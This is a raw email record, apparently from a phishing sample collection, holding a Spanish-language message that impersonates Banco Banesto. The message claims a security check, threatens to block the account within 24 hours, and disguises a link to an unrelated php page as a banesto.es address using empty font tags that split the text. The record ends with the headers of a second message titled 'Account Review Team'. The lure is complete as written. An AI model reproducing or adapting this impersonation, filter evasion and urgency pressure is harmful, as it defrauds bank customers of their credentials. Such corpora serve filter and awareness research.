From: <info@banesto.es>
Reply-To: info@banesto.es
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 252


<table>
<tr>
<td>
Estimado cliente de Banco BANESTO! <br>
Por favor, lea atentamente este aviso de seguridad.
Estamos trabajando para proteger a nuestros usuarios contra fraude. 
Su cuenta ha sido seleccionada para verificación, necesitamos confirmar que Ud. 
Es el verdadero dueño de esta cuenta. <br><br>
<a href="http://www.daisydillman.com/Zentri/ekolong.php">ht<font></font>tp://ban<font></font>esto.<font></font>es/?Verific<font></font>arAc<font></font>tivid<font></font>ad=AL12<font></font>2212</a><br><br>
Por favor tenga en cuenta que si no confirma sus datos en 24 horas, nos veremos obligados a bloquear su cuenta para su protección. <br><br>
Gracias por su paciencia.<br><br>
Sinceramente,
Banco BANESTO<br><br>
----------------------------------------------------------------<br><br>
No conteste por favor a este E-mail. El correo enviado a esta dirección no puede ser contestado.
<br><br>
</td></tr></table>



From flopet2b@linux1.bgrein.at  Thu Jan 19 20:41:46 2006
Return-Path: <flopet2b@linux1.bgrein.at>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id A2E055370E9
	for <nobody@login.example.com>; Thu, 19 Jan 2006 20:41:46 -0500 (EST)
Received: from linux1.bgrein.at (linux1.bgrein.at [193.170.220.249])
	by mail2.example.com (Postfix) with ESMTP id 28B8A6FA349
	for <nobody@example.com>; Thu, 19 Jan 2006 20:41:46 -0500 (EST)
Received: by linux1.bgrein.at (Postfix, from userid 730)
	id F02A8AB4F5; Fri, 20 Jan 2006 02:41:45 +0100 (CET)
To: nobody@example.com
Subject: Account Review Team
